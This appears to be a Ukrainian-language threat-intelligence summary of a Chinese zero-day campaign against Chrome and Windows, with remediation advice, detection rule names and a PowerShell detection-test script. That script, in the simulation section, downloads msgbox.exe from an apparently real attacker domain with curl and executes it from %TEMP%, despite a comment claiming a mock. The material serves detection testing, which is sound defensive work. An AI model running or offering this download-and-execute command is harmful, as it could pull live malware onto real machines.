Китайські хакери використовують пов’язані вразливості нульового дня у браузерах та Windows
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Два китайських учасники загроз, UTA0560 і JungleBamboo, використовують складний багаторівневий ланцюг експлойтів для атаки на Google Chrome та ядро Windows. Атаки використовують вікно патч-щілини, в якому уразливості фіксуються в Chromium до того, як відповідні оновлення дійдуть до випущених версій Google Chrome. Листи зловмисного фішингу доставляють різні навантаження, включаючи бекдор GRIMWEDGE JScript і розширення LONGTALE для Chrome.
Розслідування
Моніторинг мережевої безпеки Volexity ідентифікував кампанію зловмисного фішингу, націлену на НПО 1 вересня 2026 року. Розслідування виявило загальний ланцюг експлойтів, що включає CVE-2026-85046, CVE-2026-87491 і CVE-2026-85880. Аналітики розділили активність на два кластери: UTA0560, що впроваджує GRIMWEDGE, та JungleBamboo, що використовує SUPERSTOMP для встановлення розширення LONGTALE.
Усунення
Організації повинні утримувати Google Chrome в оновленому стані до останньої доступної версії, щоб зменшити вплив під час періодів патч-щілини. Команди безпеки повинні контролювати незвичну поведінку дочірніх процесів Chrome та несанкціоновані установки розширень Chrome. Також рекомендується потужне фільтрування електронної пошти для захисту від зловмисного фішингу та моніторинг підозрілих або несанкціонованих створень запланованих завдань.
Відповідь
Якщо виявлено експлуатацію, постраждалі хости слід негайно ізолювати, щоб запобігти подальшій командно-контрольній комунікації або латеральному переміщенню. Відповідачі повинні провести форензичний аналіз пам’яті процесів Chrome, щоб ідентифікувати впроваджений шелькод. Встановлені розширення Chrome також слід перевірити, а заплановані завдання переглянути на наявність підозрілих записів, як, наприклад Заплановані системи Windows.
Потік атаки
Ми все ще оновлюємо цю частину.
Виявлення
Підозріла використання CURL (через командний рядок)
Підозріла командно-контрольна активність через запит DNS із незвичайним доменом верхнього рівня (TLD) (через dns)
Підозріле заплановане завдання (через аудит)
IOC (HashSha256) для виявлення: Зверніть увагу на (патч) щілину: ланцюг експлойтів 0-day від декількох китайських суб’єктів загроз у Chrome та Windows
IOC (SourceIP) для виявлення: Зверніть увагу на (патч) щілину: ланцюг експлойтів 0-day від декількох китайських суб’єктів загроз у Chrome та Windows
IOC (DestinationIP) для виявлення: Зверніть увагу на (патч) щілину: ланцюг експлойтів 0-day від декількох китайських суб’єктів загроз у Chrome та Windows
Сторінки приземлення з експлойтів 0-day у Chrome [Веб-сервер]
Виявлення активності бекдора GRIMWEDGE JScript та доставки навантаження [Створення процесу Windows]
Виконання симуляції
-
Оповідь атаки та команди: Зловмисник намагається отримати точку опори на скомпрометованій системі, розгортаючи бекдор GRIMWEDGE JScript. Щоб уникнути виявлення простими антивірусними сигнатурами, атакуючий використовує
cmd.exeта вбудовану утилітуcurlдля завантаження програми-вантажника другого етапу під назвоюmsgbox.exeз віддаленої інфраструктури команд і управління (C2). Після завершення завантаження зловмисник негайно виконує навантаження зкаталогу %TEMP%щоб мінімізувати час перебування файлу на диску та використовувати каталог, який часто залишається поза увагою базового моніторингу. Ця послідовність розроблена, щоб відповідати точному шаблону командного рядка, який шукає правило виявлення. -
Сценарій регресійного тестування:
# Сценарій симуляції для спрацювання правила виявлення GRIMWEDGE. # Цей сценарій створює фіктивний файл, щоб імітувати завантажене навантаження. $tempDir = $env:TEMP $payloadName = "msgbox.exe" $payloadPath = Join-Path $tempDir $payloadName # 1. Створіть фіктивний файл 'msgbox.exe' для імітації завантаженого навантаження # У реальній атаці це був би справжній шкідливий бінарний файл. New-Item -Path $payloadPath -ItemType File -Force Set-Content -Path $payloadPath -Value "Dummy Payload Content" # 2. Виконайте точну команду строки, що вказана в логіці виявлення. # Примітка: ми використовуємо локальний підхід ехо/мок для URL, щоб гарантувати, що строка команди точно співпадає. cmd.exe /c "curl -f -sS -o ""$tempDirmsgbox.exe"" ""https://cloud.shinewrist.net/test/msgbox.exe"" && ""$tempDirmsgbox.exe""" Write-Host "Симуляцію завершено. Перевірте SIEM на наявність сповіщень, що відповідають паттерну GRIMWEDGE." -
Команди очищення:
# Сценарій очищення для видалення змодельованого навантаження та файлів. $tempDir = $env:TEMP $payloadPath = Join-Path $tempDir "msgbox.exe" if (Test-Path $payloadPath) { Remove-Item -Path $payloadPath -Force Write-Host "Очистка успішна: $payloadPath видалено." } else { Write-Host "Навантаження не знайдено. Очистка не потрібна." }